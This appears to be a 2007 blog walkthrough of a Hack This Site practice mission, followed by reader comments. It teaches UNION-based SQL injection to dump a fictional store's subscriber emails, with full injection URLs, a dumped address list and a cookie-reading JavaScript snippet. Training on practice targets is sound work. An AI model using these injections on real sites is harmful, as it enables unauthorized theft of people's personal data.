HTS Realistic 4: UNION ALL the Products

Fischer’s Animal Products: A company slaughtering animals and turning their skin into overpriced products sold to rich bastards! Help animal rights activists increase political awareness by hacking their mailing list.

So I finally got around to write a walkthrough/guide for Hack This Site realistic mission 4. Your objective is to get the email addresses of the subscribers to the news letter of Fischer’s Animal Products.

From: SaveTheWhales

Message: Hello, I was referred to you by a friend who says you know how to hack into computers and web sites - well I was wondering if you could help me out here. There’s this local store who is killing hundreds of animals a day exclusively for the purpose of selling jackets and purses etc out of their skin! I have been to their website and they have an email list for their customers. I was wondering if you could somehow hack in and send me every email address on that list? I want to send them a message letting them know of the murder they are wearing. Just reply to this message with a list of the email addresses. Please? Their website is at http://www.hackthissite.org/missions/realistic/4/. Thanks so much!!

Start by investigating every part of Fischer’s the site. There are essentially two parts which might be vulnerable. The most visible one is the email form. A clearly visible input-field, where you just add your email address and are given a “Email added successfully” message. As you’ve seen through other missions containing SQL injections, the first step is attempting to get out of the string. Try registering an email address containing apostrophes, both single and double.

Error inserting into table “email”! Email not valid! Please contact an administrator of Fischer’s.

Unsuccessful. However, we got an important piece of information: the table name is “email”.

Now for the other part of the website; the product lists. There are two product lists, “fur coats” and “alligator accessories” (how this would have anything with whales to do is beyond me). If you’ve been as observant as you should be, you’ve noticed that both are the same file–products.php–with the category ID as an argument.

What do we want to accomplish? If we wanted to select something else from that table, we could attempt to change the WHERE part of the SELECT statement by changing the category argument to something like “1 OR categpory = 2″ (which happens to give you both categories of products on one page). However, we want to add information from another table: the “email” table. This is were the MySQL command UNION comes in very handy. Using UNION, we can merge the results of two SELECT statements into one. For example, we could:

SELECT * FROM table1 UNION ALL SELECT * FROM table2;

The result would be getting all rows from table1 and all rows from table2. Note that this assumes that the number of columns in table1 and table2 are equal. If they are not, the command will not work. UNION ALL is used instead of simply UNION in order to preserve duplicate rows. It is good practice to use UNION ALL in order to avoid unexpected errors. Let’s assume that the initial query could be something like this:

SELECT * FROM products WHERE category = 1;

We also want the rows from the email table. Therefore, we’ll try looking for another category: 1 UNION ALL SELECT * FROM email, resulting in the following final query:

SELECT * FROM products WHERE category = 1 UNION ALL SELECT * FROM email;

Which is exactly what we want. However, this results in nothing of value. Remember the assumption made earlier when we UNIONed table1 and table2? They must be of the same number of columns. We can assume that “email” has fewer columns than “products” does, since the products table should be more advanced. Therefore, we add columns to the email table:

SELECT * FROM products WHERE category = 1 UNION ALL SELECT *, NULL FROM email;

NULL means nothing–it is just an empty column. This doesn’t work either, so we’ll have to keep adding NULLs until we get some results. It will finally work at three NULLs:

SELECT * FROM products WHERE category = 1 UNION ALL SELECT *, NULL, NULL, NULL FROM email;

Below the category 1 products, you can see ten broken images. Viewing the source-code, you will find that the sources of these are email addresses! Rearranging the column order will give you a more eligible format.

SELECT * FROM products WHERE category = 1 UNION ALL SELECT NULL, *, NULL, NULL FROM email;

Just copy the list and email it to SaveTheWhales!

Maybe Related?

Posted July 17, 2007 in Guides » Hack This Site.

31 Comments »

  1. Just for clarification for someone that wants to try this out.. You just copy the query (after the category = 1) into the URL. IT should look like:
    http://www.hackthissite.org/missions/realistic/4/products.php?category=1 UNION ALL SELECT NULL, *, NULL, NULL FROM email;

    Comment by Sameer Sontakey — July 18, 2007 @ 9:21 pm

  2. Thanks, Sameer. Perhaps I was a bit unclear.

    Comment by Tim — July 18, 2007 @ 10:51 pm

  3. Dude i got the list of emails, where do i give em to the guy.????

    Comment by Zephyr_Samhain — July 25, 2007 @ 10:31 am

  4. Zephyr Samhain: Good job. PM them to the HackThisSite user “SaveTheWhales”.

    Comment by Tim — July 25, 2007 @ 1:25 pm

  5. kk ill try it, thanks for all the info Tim this site is really more of a help then a cheat sheet, i try to only read a few lines to start me off then i do the rest myself, its also very helpfull if i get stuck.

    Comment by Zephyr_Samhain — July 26, 2007 @ 9:53 am

  6. Hello man…ur lyk my idol..u have helped me alot b4 as well…but i have unforunately not understood this level at all….
    1) Where, should we put what??
    -2) should v put only ‘ or…’(etc) or da whole injection which will include from, where..(etc)
    -3) where should v enter the SQL commands..in the email list??

    Comment by Rishi — July 27, 2007 @ 7:32 pm

  7. Zephyr_Samhain: Nice. Good luck.

    Rishi:
    1) Put the stuff in the code boxes (after “SELECT * FROM products WHERE category = “, since that part is already included internally in the PHP script) instead of the number in “products.php?category=1″.
    2) Do not include “SELECT * FROM products WHERE category = “, i.e. you should only inject “1 UNION ALL SELECT NULL, *, NULL, NULL FROM email;”. The reason is that the other stuff is already hard-coded into the PHP script.
    3) No; the email list is invulnerable to SQL injections. Instead, put it in the URL of the product page, after “product.php?category=”.

    Comment by Tim — July 27, 2007 @ 11:28 pm

  8. For some Dumb Reason The SQL Injection would not Work, I undersatand MOST of it and How it Works. Everytime I write the SQL Injection in the Email Field, I get the Same Meaage:
    ——————————————————————–
    Error inserting into table “email”! Email not valid! Please contact an administrator of Fischer’s.
    ——————————————————————–
    Are you Supposed to Change email; to: email@email.com

    SELECT * FROM products WHERE category = 1 UNION ALL SELECT NULL, *, NULL, NULL FROM email;

    I Know As 1 year worth of Programming, some of the Variables are Not Right.
    But My Question is why Do I Get That Same Old Message after an Injection?
    Reply:::

    Comment by Mt1Яund — August 24, 2007 @ 10:45 pm

  9. http://www.hackthissite.org/missions/realistic/4/products.php?category=11UNION%20ALL%20SELECT%20NULL,%20*,%20NULL,%20NULL%20FROM%20email;
    that is better

    Comment by friedchicken — August 28, 2007 @ 2:54 pm

  10. I’ve got the lists of email but how exactly do i complete the mission and egt the ‘gratz’ message?
    There is no email to send the list to?…

    Comment by mumin — September 16, 2007 @ 2:33 pm

  11. Mumin: Message it through the HTS messaging system.

    Comment by Tim — September 16, 2007 @ 7:03 pm

  12. Goog website !!
    thanks

    Comment by secureforever — October 1, 2007 @ 4:09 pm

  13. how the fuck do you pm the guy i cnt find it nywhere lol

    Comment by anonomous — October 6, 2007 @ 2:08 pm

  14. er idk i tried to pm SaveTheWhales and it says Error Sending Message: User may not exist. You may have tried to send an invalid message type.

    Comment by SN — October 13, 2007 @ 12:39 am

  15. Fashion and Clothing Tips…

    I couldn’t understand some parts of this article, but it sounds interesting…

    Trackback by Fashion and Clothing Tips — October 17, 2007 @ 4:30 am

  16. Products

     

    Yes, these are authentic alligator shoes, made from real alligators!$140

     

     

    Alligator purses! We tear the skin off alligators and put it in purse form so you can put your money and makeup in!$70

     

     

    Belts made of alligators! Different colors available, contact us for more information!$30

     

     

    alph-alpha-brown@hotmail.com

     

     

    sam.goodwin@yahoo.com

     

     

    UltraDeathLaser@aol.com

     

     

    SwingLow@hotmail.com

     

     

    TeaBody@aol.com

     

     

    jsmith@uic.edu

     

     

    3ambeer@graffiti.net

     

     

    shootfirst@yahoo.com

     

     

    Bobby@friends.com

     

    Comment by Anonymous — October 18, 2007 @ 4:49 am

  17. Ok - If you copy and paste this into the browser:
    http://www.hackthissite.org/missions/realistic/4/products.php?category=1 UNION ALL SELECT NULL,*,NULL,NULL FROM email;

    for me it does not work.

    However, if you copy and paste THIS into the browser,
    http://www.hackthissite.org/missions/realistic/4/products.php?category=11UNION%20ALL%20SELECT%20NULL,%20*,%20NULL,%20NULL%20FROM%20email;

    it does work, even though it is the EXACT same thing. Can anyone explain it to me? I would have had this working 10 hours ago if it weren’t for this…please help thanks.

    Comment by Nemadrias — October 23, 2007 @ 6:49 pm

  18. #

    Ok - If you copy and paste this into the browser:
    http://www.hackthissite.org/missions/realistic/4/products.php?category=1 UNION ALL SELECT NULL,*,NULL,NULL FROM email;

    for me it does not work.

    However, if you copy and paste THIS into the browser,
    http://www.hackthissite.org/missions/realistic/4/products.php?category=11UNION%20ALL%20SELECT%20NULL,%20*,%20NULL,%20NULL%20FROM%20email;

    it does work, even though it is the EXACT same thing. Can anyone explain it to me? I would have had this working 10 hours ago if it weren’t for this…please help thanks.

    Comment by Nemadrias — October 23, 2007 @ 6:49 pm

    clicking the links directly is disastrous I tell you….. after clicking it try this : javascript:alert(document.cookie)

    Comment by bh## — November 23, 2007 @ 11:11 am

  19. http://www.hackthissite.org/missions/realistic/4/products.php?category=11UNION%20ALL%20SELECT%20NULL,%20*,%20NULL,%20NULL%20FROM%20email;

    does not work for me, it only comes up with half the email adresses, can anyone explain why this is happening

    Comment by Anonymous — November 28, 2007 @ 4:49 pm

  20. Late…but look at it carefully. You didn’t put spaces after the commas. And people…don’t post the answer. Nobody learns that way.

    Comment by hx0r — January 2, 2008 @ 4:04 pm

  21. dude first one is =1 UNION
    second is =11UNION

    Comment by xant — February 21, 2008 @ 4:11 pm

  22. How do you pm the guy to complete the mission?

    Comment by Geigs — March 16, 2008 @ 6:43 pm

  23. oh dare to tell. cant send the message to >SaveTheWales

    Comment by gutag — March 28, 2008 @ 9:56 pm

  24. I keep getting the “Error Sending Message: User may not exist. You may have tried to send an invalid message type.” when I try to PM it to SaveTheWales. What am I doing wrong?

    Comment by Liam — March 31, 2008 @ 2:19 am

  25. How to send the email?

    Comment by Anonymous — April 3, 2008 @ 4:49 am

  26. what should I do? it says The requested users to be added do not exist!!!!

    Comment by Anonymous — April 22, 2008 @ 10:09 pm

  27. After you get the e-mails just go back to HtS page and at your left click on “HTS Messages Center”. Then, on Compose. Put SaveTheWhales as receiver and just paste the e-mails on the message box. Gratz, you completed it.

    Ps: Thanks for this awsome guides Tim

    Comment by RaGe — May 1, 2008 @ 1:04 pm

  28. If you still haven’t grasped the e-mail concept, go to
    http://www.hackthissite.org/pages/messages/msys/send.php
    Great guide Tim, fast, simple, and informative.

    Comment by Lambda — May 12, 2008 @ 10:23 pm

  29. As a note to anyone having trouble sending the message and completing the mission, you CANNOT send the message after clicking on the “Private Messages” link. You need to go to the HTS message center and send the message from there.

    Alternatively, use the link that Lambda provided above. It should work.

    Comment by Fakr — July 10, 2008 @ 4:59 am

  30. Thanks for making that clear, Fakr.

    Comment by Tim — July 11, 2008 @ 9:45 am

  31. ok 3 things…

    1. can ppl stop postin the answer (i need to learn, not read a walkthru =]
    2. Anyone explain why & how u get to thinkin more NULL’s??
    3. Great site.. Cheers!

    Comment by riQeh — August 7, 2008 @ 11:00 pm

RSS feed for comments on this post. TrackBack URI

Leave a comment

FireStats iconAnvänder FireStats